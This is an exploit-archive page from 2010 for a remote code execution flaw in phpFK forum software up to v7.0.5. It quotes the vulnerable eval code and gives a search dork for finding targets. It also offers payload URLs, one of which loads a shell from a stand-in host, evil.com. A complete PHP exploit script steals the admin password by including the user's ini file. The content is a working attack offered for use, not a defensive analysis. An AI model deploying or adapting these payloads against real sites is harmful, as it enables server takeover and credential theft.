phpFK <= v7.0.5 Remote Code Execution
Posted on 22 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>phpFK <= v7.0.5 Remote Code Execution</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================== phpFK <= v7.0.5 Remote Code Execution ===================================== +-------------------------------------------------------------------------------------------------------------------------------+ | _______ __ ______ | | | | |.--.--.| |--..-----. | |.----..-----..--.--.--. | | | || | || < | -__| | ---|| _|| -__|| | | | | | |__|____||_____||__|__||_____| |______||__| |_____||________| | +-------------------------------------------------------------------------------------------------------------------------------+ | Name: phpFK <= v7.0.5 RCE | | Software: phpFK <= v7.0.5 | | Site: http://frank-karau.de/ | | Download: http://frank-karau.de/download/phpfk_php_forum_7.05.zip | | Vulnerability: Remote Code Execution | | Severity: medium ( low / medium / high ) | | Tested on: v7.0.5 | | Dork: "© phpFK" | | Requires: register_globals = On | +-------------------------------------------------------------------------------------------------------------------------------+ | Author: Lord-Anubis | | Contact: lord.anu bis4[at]gm ail[dot]com | | Date: 21.06.2010 ( dd.mm.yyyy ) | | Site: http://lordanubis.altervista.org/ | | Defaces: http://www.zone-h.org/archive/notifier=Lord-Anubis | | Exploits: http://inj3ct0r.com/author/2486 | +-------------------------------------------------------------------------------------------------------------------------------+ | Bug File: include/init.php | | 25. if (ini_get('register_globals')) | | 26. { | | 27. foreach($_GET as $s_name => $s_value) | | 28. { | | 29. eval('$'.$s_name.' = '';'); | | 30. } | | 31. foreach($_POST as $s_name => $s_value) | | 32. { | | 33. eval('$'.$s_name.' = '';'); | | 34. } | | 35. } | +-------------------------------------------------------------------------------------------------------------------------------+ | Bug Explanation: | | - EN: In the file include/init.php the register_globals being disabled by cycling the variables GET/POST and through | | the function eval they being overwritten and they will be unusables.... It's possible execute the code using | | the function eval. It's Sufficent insert some evil code in the variable GET/POST's Key. | | Examples: | | 1) http://www.[site].com/[path]/index.php?a;require(str_replace('_',chr(46),'data/user/[nickAdmin].usr.ini'))?> | | 2) http://www.[site].com/[path]/index.php?a;require(str_replace('_',chr(46),'http://www.evil.com/shell.txt'))?> | | //////////////////////////////////////////////////////////////////////////////////////////////////////////////////// | | - ITA: Nel file include/init.php le register_globals vengono disabilitate ciclando la variabili GET/POST e tramite | | la funzione eval vengono sovrascritte in modo da renderle inutilizzabili... è possibile eseguire del codice | | sfruttando la stessa funzione eval. Basterà inserire del codice nocivo nella chiave della variabile GET/POST. | | Esempi validi sono: | | 1) http://www.[site].com/[path]/index.php?a;require(str_replace('_',chr(46),'data/user/[nickAdmin].usr.ini'))?> | | 2) http://www.[site].com/[path]/index.php?a;require(str_replace('_',chr(46),'http://www.evil.com/shell.txt'))?> | | //////////////////////////////////////////////////////////////////////////////////////////////////////////////////// | | - PL: ... | +-------------------------------------------------------------------------------------------------------------------------------+ | Exploit: | +-------------------------------------------------------------------------------------------------------------------------------+ <?php /** * exploit.php * * Software: phpFK <= v7.0.5 * Author: Lord-Anubis <lord.anu bis4[at]gm ail[dot]com> * Vulnerability: Remote Code Execution */ // error_reporting(0); ini_set("max_execution_time", 0); // function codeExec() { global $userName; return "a;require(str_replace(%27_%27,chr(46),%27data/user/{$userName}.usr.ini%27))?%3E"; } // if ($argc != 3) { exit( "[+] Software: phpFK <= v7.0.5 ". "[+] Author: Lord-Anubis ". "[+] Vulnerability: Remote Code Execution ". "[+] Usage: ./exploit [hostName] [path] [evilUserName] ". "[+] Example: ". "[+] ./exploit 127.0.0.1 / admin ". "[+] ./exploit hostname.com /phpFK/ moderator " ); } // list($cli, $hostName, $path, $userName) = $argv // if (!preg_match('/password=([a-zA-Z0-9]+)/is', file_get_contents("http://{$hostName}{$path}index.php?".codeExec()), $return)) { exit("[-] Exploit failed "); } // echo("[+] Password: {$return[1]} "); echo("[+] Exploit successfull "); exit; ?> # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-22]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
